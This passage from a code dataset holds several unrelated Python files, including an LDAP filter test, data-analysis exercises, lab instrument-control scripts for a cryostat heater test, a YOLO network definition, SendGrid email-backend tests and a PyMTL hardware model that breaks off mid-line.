rdn='ou=People')\n assert cos.filter(real_value)\n\n\n@pytest.mark.parametrize(\"real_value\", INDEXES_FALSE)\ndef test_indexing_negative(topo, _create_entries, real_value):\n \"\"\"Test negative index filters\n\n :id: 7e19deae-91ae-11e9-900c-8c16451d917b\n :parametrized: yes\n :setup: Standalone\n :steps:\n 1. Try to pass negative filter rules as per the condition .\n :expectedresults:\n 1. Fail\n \"\"\"\n cos = CosTemplates(topo.standalone, DEFAULT_SUFFIX, rdn='ou=People')\n assert not cos.filter(real_value)\n\n\nif __name__ == '__main__':\n CURRENT_FILE = os.path.realpath(__file__)\n pytest.main(\"-s -v %s\" % CURRENT_FILE)\n","repo_name":"389ds/389-ds-base","sub_path":"dirsrvtests/tests/suites/filter/filter_indexing_test.py","file_name":"filter_indexing_test.py","file_ext":"py","file_size_in_byte":5773,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"31"} +{"seq_id":"16488293891","text":"#Saurav Hossain\n#09/21/18\n'''\nAsk the user for the name of the input file.\nAsk the user for the attribute (column header) to search by.\n'''\n\n#Taken from lab and edited\n#Import pandas for reading and analyzing CSV data:\nimport pandas as pd\n\nx = input() \nss = input()\n \ntickets = pd.read_csv(x)\nprint(\"The 10 worst offenders are:\")\nprint(tickets[ss].value_counts()[:10]) #Print out the dataframe","repo_name":"SauravShoaeib/College","sub_path":"CS_127/Python/parking_ticket.py","file_name":"parking_ticket.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6084412063","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 29 17:38:08 2018\n\n@author: Nik\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndataset = pd.read_csv('50_Startups.csv')\n\nX = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,-1].values\n\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:,-1] = labelencoder_X.fit_transform(X[:,-1])\nonehotencoder = OneHotEncoder(categorical_features=[3])\nX = onehotencoder.fit_transform(X).toarray()\n\n#dummy variable\nX = X[:,1:]\n\nimport statsmodels.formula.api as sm\nX = np.append(arr = np.ones((50,1)).astype(int),values = X,axis =1)\nX_opt = X[:,[0,1,2,3,4,5]]\n\ndef backward_elimination(x,sl):\n for i in range(len(x[0])):\n regressor_OLS = sm.OLS(endog = y ,exog = x).fit()\n p_values = regressor_OLS.pvalues\n max_p_value = max(p_values)\n index_maxp = list(p_values).index(max_p_value)\n if max_p_value>sl:\n x = np.delete(x,index_maxp,1)\n else:\n return x\n \nX_modeled = backward_elimination(X_opt,0.05)\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X_modeled,y,test_size = 0.2,random_state = 42)\n\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train,y_train)\ny_pred = regressor.predict(X_test)\n\nprint(y_pred[0:2])\n","repo_name":"NikhilArroju/mlcodepractice","sub_path":"Regression/nik_multreg.py","file_name":"nik_multreg.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18074374382","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 13 13:46:22 2018\n\n@author: jlm7\n\"\"\"\n\nfrom ka3305p import ka3305p\nfrom srs_sim970 import SIM970\nimport time\nimport matplotlib.pyplot as plt\nimport client\nimport math\nimport numpy as np\nfrom tqdm import tqdm\nimport datetime\n\n\n\n# SEE THIS LINK FOR USEFUL INSTRUCTIONS\n# https://qittlab-nuc-01.campus.nist.gov/wordpress/wp-admin/post.php?post=5878&action=edit\n#%% INITIALIZATION AND SETUP\n\n#Create objects for the voltage source and voltmeter\nsource = ka3305p('COM8')\nvoltmeter = SIM970('GPIB0::4',7)\n\n#Set impedence for the voltmeter channels being used \nvoltmeter.set_impedance(True,channel=1)\nvoltmeter.set_impedance(True,channel=2)\n#voltmeter.set_impedance(True,channel=3)\n#voltmeter.set_impedance(True,channel=4)\nsource.set_output(on=False)\n\n#%%Initialize variables with what will be used. \n\n#******************************************************************************\n# NOTE: NOTHING HERE NEEDS TO BE CHANGED. HOWEVER...\n# YOU CAN CHANGE THE POWER DELIVERED TO THE STAGE WITH THE power_wanted VARIABLE HOWEVER IT CAN BE LEFT AT 2\n# YOU CAN ALSO CHANGE THE WAIT TIME BEFORE THE HEATER TURNS ON WITH cur_time HOWEVER IT CAN BE LEFT AT -10 \n# YOU CAN ALSO CHANGE THE run_time VARIABLE WHICH SETS HOW LONG THE TEMPERATURE WILL BE MESAURED FOR\n# YOU CAN ALSO CHANGE THE CHANNEL FOR THE VOLTAGE SOURCE OR VOLTMETER MEASUREMENTS\n# YOU CAN ALSO CHANGE THE VALUE OF THE SERIES RESISTOR ON YOUR CIRCUIT WITH series_resistance\n#******************************************************************************\n\npre_heat_time = 10 #waits this long before turning on the heater. 10 means it waits 10 seconds and then turns on the heater\npower_wanted = 2 #this is the watts delivered to the heater\nrun_time = 10000 #this is the number of seconds the test will run for (note, it will go this long to heat, and this long to cool) total test = 2* runtime\nvoltage_source_channel = 1 # this is the channel on the voltmeter you plugged the heater resistor into\nvoltmeter_series_voltage_channel = 1 # this is the voltmeter channel connected to the series resistor (NOT TO THE CRYOSTAT)\nvoltmeter_resistor_voltage_channel = 2 # this is the voltmeter channel connected to the resistor in the cryostat\nseries_resistance = 10 # this is the value of the resistor connected in series to the voltage source(should be 10 ohm)\n\n# DON'T CHANGE ANY OF THESE VARIABLES\ntemp_4K = []\ntemp_40K = []\nseries_voltage_40K = []\npower_resistor_voltage_40K = []\nseries_current_40K = []\navg_powers = []\ntime_array = []\nset_voltage = 1.2*math.sqrt(50 * power_wanted)\ncur_time = 0\n\n#%% TURN ON THE VOLTAGE SOURCE -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\ntime.sleep(2)\nsource.set_voltage(channel=voltage_source_channel, voltage=round(set_voltage,2))\ntime.sleep(2)\n\n#%% BEGIN MEASURING TEMP DATA BEFORE THE HEATER TURNS ON -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\n\nprint(\"Begin Data collection no heat\")\nstart_time = time.time()\n# Make a status bar for the user to follow\nwith tqdm(total=pre_heat_time, unit=\"s\") as pbar:\n cur_time = time.time()\n while (cur_time < start_time + pre_heat_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n time_array.append(cur_time - start_time)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n\n \n#%% BEGIN MEAUREING TEMP DATA AFTER THE HEATER TURNS ON -> NOTHING NEEDS TO BE CHANGED IN HERE FOR YOUR SETTINGS\nsource.set_output(on=True)\nprint(\"\\n\\nBegin heating Loop\")\nwith tqdm(total=run_time, unit=\"s\") as pbar: # CHANGE THIS TO ADJUST TOTAL MEASUREMENT TIME\n cur_time = time.time()\n while (cur_time < start_time + pre_heat_time + run_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n #this is incremented due to the average run time of each of these loops\n time_array.append(cur_time - start_time)\n series_v_read = voltmeter.read_voltage(channel = voltmeter_series_voltage_channel)\n r_voltage = voltmeter.read_voltage(channel = voltmeter_resistor_voltage_channel)\n s_current = (set_voltage - series_v_read) / series_resistance\n series_voltage_40K.append(series_v_read)\n power_resistor_voltage_40K.append(r_voltage)\n series_current_40K.append(s_current)\n avg_powers.append(s_current * r_voltage)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n \nsource.set_output(on=False)\noff_time = time.time() - start_time\n\n# Now run the cooling loop\nprint(\"\\n\\nBegin Cooling Loop\")\nwith tqdm(total=run_time, unit=\"s\") as pbar: # CHANGE THIS TO ADJUST TOTAL MEASUREMENT TIME\n cur_time = time.time()\n while (cur_time < off_time + start_time + run_time):\n all_temps = client.client('132.163.53.67',50326,'getall').decode('ascii').split(',')\n temp_4K.append(float(all_temps[5]))\n temp_40K.append(float(all_temps[6]))\n #this is incremented due to the average run time of each of these loops\n time_array.append(cur_time - start_time)\n series_v_read = voltmeter.read_voltage(channel = voltmeter_series_voltage_channel)\n r_voltage = voltmeter.read_voltage(channel = voltmeter_resistor_voltage_channel)\n s_current = (set_voltage - series_v_read) / series_resistance\n series_voltage_40K.append(series_v_read)\n power_resistor_voltage_40K.append(r_voltage)\n series_current_40K.append(s_current)\n avg_powers.append(s_current * r_voltage)\n prev_time = cur_time\n cur_time = time.time()\n pbar.update(cur_time - prev_time)\n\n#%% CREATE THE GRAPH WHICH WILL SHOW THE TEMPEREATURE DATA vs TIME -> MAKE SURE TO CHANGE THE GRAPH LABEL DEPENDING ON WHERE THE POWER WAS APPLIED\n#*****************************************************************************\n# NOTE:\n# CHANGE THE TITLE TO CORRESPOND TO WHERE THE POWER WAS APPLIED\n# DONT CHANGE THE Y LABELS\n\n#*****************************************************************************\n\nprint(\"Avg Power: \", np.mean(avg_powers))\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax2 = ax1.twinx()\nax1.plot(time_array, temp_4K, '-ro')\nax1.set_xlabel(\"Time (s)\")\nax1.set_ylabel(\"Temperature in 4K(K)\",color='r')\nax1.set_title(\"Temperature Applied in 40K\")\nax2.plot(time_array, temp_40K, '-bo')\nplt.axvline(x = off_time, color='k', linestyle='--')\nplt.text(off_time+1, 4.5, \"Power Off\", rotation=90)\nax2.set_ylabel(\"Temperature in 40K(K)\", color='b')\nax1.legend(loc=\"best\")\nax1.margins(0.1)\nfig.tight_layout()\nnow = datetime.datetime.now()\nstring = \"images/\" + now.strftime(\"%Y-%m-%d-%H-%M\") + \".png\"\nplt.savefig(string)\n\nsource.close()","repo_name":"melonisj/python-nist","sub_path":"heat_map/temp_settle.py","file_name":"temp_settle.py","file_ext":"py","file_size_in_byte":6941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41339073240","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ConvolutionalLayer(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, stride, padding):\n super(ConvolutionalLayer, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size, stride, padding),\n nn.BatchNorm2d(out_channels),\n nn.LeakyReLU(0.1)\n )\n def forward(self, x):\n return self.conv(x)\n\nclass ResidualLayer(nn.Module):\n def __init__(self, in_channels):\n super(ResidualLayer, self).__init__()\n self.resblock = nn.Sequential(\n ConvolutionalLayer(in_channels, in_channels // 2, kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(in_channels // 2,in_channels,kernel_size=3,stride=1,padding=1)\n )\n\n def forward(self, x):\n return x + self.resblock(x)\n\nclass DownSampleLayer(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(DownSampleLayer, self).__init__()\n self.conv = nn.Sequential(\n ConvolutionalLayer(in_channels, out_channels, kernel_size=3, stride=2, padding=1)\n )\n\n def forward(self, x):\n return self.conv(x)\n\nclass UpSampleLayer(nn.Module):\n def __init__(self):\n super(UpSampleLayer, self).__init__()\n\n def forward(self, x):\n return F.interpolate(x, scale_factor=2, mode=\"nearest\")\n\nclass ConvolutionalSetLayer(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(ConvolutionalSetLayer, self).__init__()\n self.conv = nn.Sequential(\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(out_channels, in_channels, kernel_size=3, stride=1, padding=1),\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1, stride=1, padding=0),\n ConvolutionalLayer(out_channels, in_channels, kernel_size=3, stride=1, padding=1),\n ConvolutionalLayer(in_channels, out_channels, kernel_size=1,stride=1, padding=0)\n )\n\n def forward(self, x):\n return self.conv(x)\n\nclass Darknet53(nn.Module):\n def __init__(self,num_classes):\n super(Darknet53, self).__init__()\n\n self.num_classes = num_classes\n\n self.feature_52 = nn.Sequential(\n ConvolutionalLayer(3, 32, 3, 1, 1), # 3x3 卷积\n DownSampleLayer(32, 64), # 下采样\n\n ResidualLayer(64),\n\n DownSampleLayer(64, 128), # 3x3 ,strid=2,下采样\n\n ResidualLayer(128),\n ResidualLayer(128),\n\n DownSampleLayer(128, 256), # 下采样\n\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256),\n ResidualLayer(256)\n ) # 尺寸为52 x 52的特征图\n\n self.feature_26 = nn.Sequential(\n DownSampleLayer(256, 512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512),\n ResidualLayer(512)\n ) # 尺寸为26x26的特征图\n\n self.feature_13 = nn.Sequential(\n DownSampleLayer(512, 1024), # 下采样\n ResidualLayer(1024),\n ResidualLayer(1024),\n ResidualLayer(1024),\n ResidualLayer(1024))\n\n self.convolset_13 = nn.Sequential(\n ConvolutionalSetLayer(1024,512)\n )\n\n self.convolset_26 = nn.Sequential(\n ConvolutionalSetLayer(768,256)\n )\n\n self.convolset_52 = nn.Sequential(\n ConvolutionalSetLayer(384,128)\n )\n\n self.detection_13 = nn.Sequential(\n ConvolutionalLayer(512, 1024, 3, 1, 1),\n nn.Conv2d(1024,(5 + self.num_classes)*3,1,1,0)\n ) # detection 13 x 13\n\n self.detection_26 = nn.Sequential(\n ConvolutionalLayer(256, 512, 3, 1, 1),\n nn.Conv2d(512,(5 + self.num_classes)*3,1,1,0)\n ) # detection 26 x 26\n\n self.detection_52 = nn.Sequential(\n ConvolutionalLayer(128, 256, 3, 1, 1),\n nn.Conv2d(256,(5 + self.num_classes)*3,1,1,0)\n ) # detection 52 x 52\n\n self.up_26 = nn.Sequential(\n ConvolutionalLayer(512, 256, 1, 1, 0),\n UpSampleLayer()\n ) # upsample 13->26\n\n self.up_52 = nn.Sequential(\n ConvolutionalLayer(256, 128, 1, 1, 0),\n UpSampleLayer()\n ) # upsample 26->52\n\n def forward(self, x):\n h_52 = self.feature_52(x)\n h_26 = self.feature_26(h_52)\n h_13 = self.feature_13(h_26)\n\n conval_13 = self.convolset_13(h_13)\n detection_13 = self.detection_13(conval_13)\n\n up_26 = self.up_26(conval_13)\n route_26 = torch.cat((up_26, h_26), dim=1)\n conval_26 = self.convolset_26(route_26)\n detection_26 = self.detection_26(conval_26)\n\n up_52 = self.up_52(conval_26)\n route_52 = torch.cat((up_52, h_52), dim=1)\n conval_52 = self.convolset_52(route_52)\n detection_52 = self.detection_52(conval_52)\n\n return detection_13, detection_26, detection_52\n\n\nif __name__ == \"__main__\":\n\n anchors = [10, 13, 16, 30, 33, 23, 30, 61, 62, 45, 59, 119, 116, 90, 156, 198, 373, 326]\n dete_13_mask = [6, 7, 8]\n dete_26_mask = [3, 4, 5]\n dete_52_mask = [0,1,2]\n","repo_name":"brookicv/DLearning","sub_path":"yolo/darknet53.py","file_name":"darknet53.py","file_ext":"py","file_size_in_byte":5575,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"8343845360","text":"import base64\nimport sys\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage, EmailMultiAlternatives\nfrom django.test import override_settings\nfrom django.test.testcases import SimpleTestCase\n\nfrom sendgrid_backend.mail import SendgridBackend\n\nif sys.version_info >= (3.0, 0.0, ):\n from email.mime.image import MIMEImage\nelse:\n from email.MIMEImage import MIMEImage\n\n\nclass TestMailGeneration(SimpleTestCase):\n\n # Any assertDictEqual failures will show the entire diff instead of just a snippet\n maxDiff = None\n\n @classmethod\n def setUpClass(self):\n super(TestMailGeneration, self).setUpClass()\n with override_settings(EMAIL_BACKEND=\"sendgrid_backend.SendgridBackend\",\n SENDGRID_API_KEY=\"DUMMY_API_KEY\"):\n self.backend = SendgridBackend()\n\n def test_EmailMessage(self):\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n cc=[\"Stephanie Smith \"],\n bcc=[\"Sarah Smith \"],\n reply_to=[\"Sam Smith \"],\n )\n\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"cc\": [{\n \"email\": \"stephanie.smith@example.com\",\n \"name\": \"Stephanie Smith\"\n }],\n \"bcc\": [{\n \"email\": \"sarah.smith@example.com\",\n \"name\": \"Sarah Smith\"\n }],\n \"subject\": \"Hello, World!\"\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": {\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"reply_to\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \"Hello, World!\"\n }]\n }\n\n self.assertDictEqual(result, expected)\n\n def test_EmailMessage_attributes(self):\n \"\"\"Test that send_at and categories attributes are correctly written through to output.\"\"\"\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n\n # Set new attributes as message property\n msg.send_at = 1518108670\n msg.categories = ['mammal', 'dog']\n\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"subject\": \"Hello, World!\",\n \"send_at\": 1518108670,\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": {\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \"Hello, World!\"\n }],\n \"categories\": ['mammal', 'dog'],\n }\n\n self.assertDictEqual(result, expected)\n\n def test_EmailMultiAlternatives(self):\n msg = EmailMultiAlternatives(\n subject=\"Hello, World!\",\n body=\" \",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n cc=[\"Stephanie Smith \"],\n bcc=[\"Sarah Smith \"],\n reply_to=[\"Sam Smith \"],\n )\n\n msg.attach_alternative(\"Hello World!\", \"text/html\")\n \n # Test CSV attachment\n msg.attach(\"file.csv\", \"1,2,3,4\", \"text/csv\")\n result = self.backend._build_sg_mail(msg)\n expected = {\n \"personalizations\": [{\n \"to\": [{\n \"email\": \"john.doe@example.com\",\n \"name\": \"John Doe\"\n }, {\n \"email\": \"jane.doe@example.com\",\n }],\n \"cc\": [{\n \"email\": \"stephanie.smith@example.com\",\n \"name\": \"Stephanie Smith\"\n }],\n \"bcc\": [{\n \"email\": \"sarah.smith@example.com\",\n \"name\": \"Sarah Smith\"\n }],\n \"subject\": \"Hello, World!\"\n }],\n \"from\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"mail_settings\": {\n \"sandbox_mode\": {\n \"enable\": False\n }\n },\n \"reply_to\": {\n \"email\": \"sam.smith@example.com\",\n \"name\": \"Sam Smith\"\n },\n \"subject\": \"Hello, World!\",\n \"tracking_settings\": {\"open_tracking\": {\"enable\": True}},\n \"attachments\": [{\n \"content\": \"MSwyLDMsNA==\",\n \"filename\": \"file.csv\",\n \"type\": \"text/csv\"\n }],\n \"content\": [{\n \"type\": \"text/plain\",\n \"value\": \" \",\n }, {\n \"type\": \"text/html\",\n \"value\": \"Hello World!\",\n }]\n }\n\n self.assertDictEqual(result, expected)\n\n def test_reply_to(self):\n kwargs = {\n \"subject\": \"Hello, World!\",\n \"body\": \"Hello, World!\",\n \"from_email\": \"Sam Smith \",\n \"to\": [\"John Doe \"],\n \"reply_to\": [\"Sam Smith \"],\n \"headers\": {\"Reply-To\": \"Stephanie Smith \"}\n }\n\n # Test different values in Reply-To header and reply_to prop\n msg = EmailMessage(**kwargs)\n with self.assertRaises(ValueError):\n self.backend._build_sg_mail(msg)\n\n # Test different names (but same email) in Reply-To header and reply_to prop\n kwargs[\"headers\"] = {\"Reply-To\": \"Bad Name \"}\n msg = EmailMessage(**kwargs)\n with self.assertRaises(ValueError):\n self.backend._build_sg_mail(msg)\n\n # Test same name/email in both Reply-To header and reply_to prop\n kwargs[\"headers\"] = {\"Reply-To\": \"Sam Smith \"}\n msg = EmailMessage(**kwargs)\n result = self.backend._build_sg_mail(msg)\n self.assertDictEqual(result[\"reply_to\"], {\"email\": \"sam.smith@example.com\", \"name\": \"Sam Smith\"})\n\n def test_mime(self):\n msg = EmailMultiAlternatives(\n subject=\"Hello, World!\",\n body=\" \",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n\n content = ''\n msg.attach_alternative(content, \"text/html\")\n with open(\"test/linux-penguin.png\", \"rb\") as f:\n img = MIMEImage(f.read())\n img.add_header(\"Content-ID\", \"linux_penguin\")\n msg.attach(img)\n\n result = self.backend._build_sg_mail(msg)\n self.assertEqual(len(result[\"content\"]), 2)\n self.assertDictEqual(result[\"content\"][0], {\"type\": \"text/plain\", \"value\": \" \"})\n self.assertDictEqual(result[\"content\"][1], {\"type\": \"text/html\", \"value\": content})\n self.assertEqual(len(result[\"attachments\"]), 1)\n with open(\"test/linux-penguin.png\", \"rb\") as f:\n if sys.version_info >= (3.0, 0.0, ):\n self.assertEqual(bytearray(result[\"attachments\"][0][\"content\"], \"utf-8\"), base64.b64encode(f.read()))\n else:\n self.assertEqual(result[\"attachments\"][0][\"content\"], base64.b64encode(f.read()))\n self.assertEqual(result[\"attachments\"][0][\"type\"], \"image/png\")\n\n def test_templating(self):\n msg = EmailMessage(\n subject=\"Hello, World!\",\n body=\"Hello, World!\",\n from_email=\"Sam Smith \",\n to=[\"John Doe \", \"jane.doe@example.com\"],\n )\n msg.template_id = \"test_template\"\n result = self.backend._build_sg_mail(msg)\n\n self.assertIn(\"template_id\", result)\n self.assertEquals(result[\"template_id\"], \"test_template\")\n\n\n \"\"\"\n todo: Implement these\n def test_attachments(self):\n pass\n\n def test_headers(self):\n pass\n\n \"\"\"\n","repo_name":"MIKNOTAURO/django-sendgrid-v5","sub_path":"test/test_mail.py","file_name":"test_mail.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"12359939955","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 07 11:47:39 2014\n\n@author: Eusebio OLG\n\"\"\"\n\nimport visa\n\ndef connect2inst(to):\n \n global rm, devs, LCR\n rm = visa.ResourceManager()\n\n #devs = rm.list_resources()[0]\n #LCR = rm.get_instrument(devs, timeout=to) #opens the instrument and assings it to class LCR\n LCR = rm.get_instrument('TCPIP0::192.168.185.127::inst0::INSTR') \n \n LCR.write('*cls;:abor;:disp:ccl')\n\n return LCR","repo_name":"eolalde/E4980A","sub_path":"lcr_com/init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"3231971113","text":"#====================================================================\n# FindMax\n#====================================================================\nfrom pymtl import *\nfrom pclib.rtl import GtComparator, RegEnRst, RegRst, Mux\nfrom pclib.ifcs import InValRdyBundle, OutValRdyBundle\nfrom FindMaxMsg import FindMaxReqMsg, FindMaxRespMsg\n\nimport math\n\n#====================================================================\n# FindMax Datapath\n#====================================================================\nclass FindMaxDpathRTL( Model ):\n\n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n \n # Interface\n s.req_msg_data = InPort (nbits)\n s.resp_msg_data = OutPort (nbits)\n s.resp_msg_idx = OutPort ( int( math.ceil( math.log( k , 2 ) ) ) ) \n \n # dpath->ctrl\n s.isLarger = OutPort (1)\n\n # ctrl->dapth\n s.max_reg_en = InPort (1)\n s.idx_reg_en = InPort (1)\n s.knn_mux_sel = InPort (1)\n s.knn_counter = InPort ( int( math.ceil( math.log( k , 2 ) ) ) ) # max 3\n \n # Internal Signals\n s.knn_data0 = Wire( Bits(nbits) )\n\n s.connect( s.req_msg_data, s.knn_data0 )\n\n # knn Mux \n s.knn_data1 = Wire( Bits(nbits) )\n s.max_reg_out = Wire( Bits(nbits) )\n\n s.knn_mux = m = Mux( nbits, 2 )\n s.connect_dict({\n m.sel : s.knn_mux_sel,\n m.in_[0] : s.req_msg_data,\n m.in_[1] : s.max_reg_out,\n m.out : s.knn_data1\n })\n\n # Greater than comparator\n s.knn_GtComparator = m = GtComparator( nbits )\n s.connect_dict({\n m.in0 : s.knn_data0,\n m.in1 : s.knn_data1,\n m.out : s.isLarger\n })\n\n # Max Reg \n s.max_reg = m = RegEnRst( nbits )\n s.connect_dict({\n m.en : s.max_reg_en,\n m.in_ : s.knn_data0,\n m.out : s.max_reg_out\n })\n \n # Idx Reg \n s.idx_reg = m = RegEnRst( int( math.ceil( math.log( k , 2 ) ) ) ) # max 2\n s.connect_dict({\n m.en : s.idx_reg_en,\n m.in_ : s.knn_counter,\n m.out : s.resp_msg_idx\n })\n \n s.connect( s.max_reg_out, s.resp_msg_data )\n\n#====================================================================\n# FindMax Control Unit\n#====================================================================\nclass FindMaxCtrlRTL( Model ):\n \n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n\n # Interface\n s.req_val = InPort (1)\n s.req_rdy = OutPort (1)\n\n s.resp_val = OutPort (1)\n s.resp_rdy = InPort (1)\n\n # dpath->ctrl\n s.isLarger = InPort (1)\n\n # ctrl->dapth\n s.max_reg_en = OutPort (1)\n s.idx_reg_en = OutPort (1)\n s.knn_mux_sel = OutPort (1)\n s.knn_counter = OutPort ( int( math.ceil( math.log( k , 2 ) ) ) ) # max 3\n\n # internal signal\n s.count_go = Wire( Bits(1) )\n\n # states\n s.STATE_IDLE = 0 \n s.STATE_CMP = 1 # do compare or store reference data\n s.STATE_DONE = 2 # return max value and its index\n\n s.state = RegRst( 2, reset_value = s.STATE_IDLE )\n \n # Counters\n s.knn_count = Wire ( int( math.ceil( math.log( k, 2) ) ) ) # max 3\n\n @s.tick\n def counter():\n if ( s.count_go == 1 ):\n s.knn_count.next = s.knn_count + 1\n else:\n s.knn_count.next = 0\n \n #------------------------------------------------------\n # state transtion logic\n #------------------------------------------------------\n\n @s.combinational\n def state_transitions():\n \n curr_state = s.state.out\n next_state = s.state.out\n\n if ( curr_state == s.STATE_IDLE ):\n if ( s.req_val and s.req_rdy ):\n next_state = s.STATE_CMP\n\n if ( curr_state == s.STATE_CMP ):\n if ( s.knn_count == k - 1 ):\n next_state = s.STATE_DONE\n\n if ( curr_state == s.STATE_DONE ):\n if ( s.resp_val and s.resp_rdy ):\n next_state = s.STATE_IDLE\n\n s.state.in_.value = next_state\n\n\n #------------------------------------------------------\n # state output logic\n #------------------------------------------------------\n \n @s.combinational\n def state_outputs():\n \n current_state = s.state.out\n\n if ( current_state == s.STATE_IDLE ):\n s.req_rdy.value = 1\n s.resp_val.value = 0\n\n s.max_reg_en.value = 1\n s.idx_reg_en.value = 1\n s.knn_mux_sel.value = 0\n if ( s.req_val and s.req_rdy ):\n s.count_go.value = 1\n else: \n s.count_go.value = 0\n\n elif ( current_state == s.STATE_CMP ):\n s.resp_val.value = 0\n s.count_go.value = 1\n \n s.req_rdy.value = 1\n s.knn_mux_sel.value = 1\n if ( s.isLarger == 1):\n s.idx_reg_en.value = 1\n s.max_reg_en.value = 1\n else:\n s.idx_reg_en.value = 0\n s.max_reg_en.value = 0\n \n elif ( current_state == s.STATE_DONE ):\n s.req_rdy.value = 0\n s.resp_val.value = 1\n\n s.max_reg_en.value = 0\n s.idx_reg_en.value = 0\n s.knn_mux_sel.value = 0\n s.count_go.value = 0\n\n s.connect( s.knn_count, s.knn_counter )\n\n\n#====================================================================\n# FindMax Top Level\n#====================================================================\nclass FindMaxPRTL( Model ):\n\n # Constructor\n def __init__( s, nbits = 6, k = 3 ):\n \n # Interface\n s.req = InValRdyBundle ( FindMaxReqMsg() ) \n s.resp = OutValRdyBundle ( FindMaxRespMsg() )\n\n # Instantiate datapath and control\n s.dpath = FindMaxDpathRTL( nbits, k = 3 )\n s.ctrl = FindMaxCtrlRTL ( nbits, k = 3 )\n\n # connect input interface to dpath/ctrl\n s.connect( s.req.msg.data, s.dpath.req_msg_data )\n\n s.connect( s.req.val, s.ctrl.req_val )\n s.connect( s.resp.rdy, s.ctrl.resp_rdy )\n \n # connect dpath/ctrl to output interface\n s.connect( s.dpath.resp_msg_data, s.resp.msg.data )\n s.connect( s.dpath.resp_msg_idx, s.resp.msg.idx ) \n \n s.connect( s.ctrl.req_rdy, s.req.rdy )\n s.connect( s.ctrl.resp_val, s.resp.val )\n\n # connect dpath/ctrl\n s.connect( s.dpath.isLarger, s.ctrl.isLarger )\n s.connect( s.ctrl.max_reg_en, s.dpath.max_reg_en )\n s.connect( 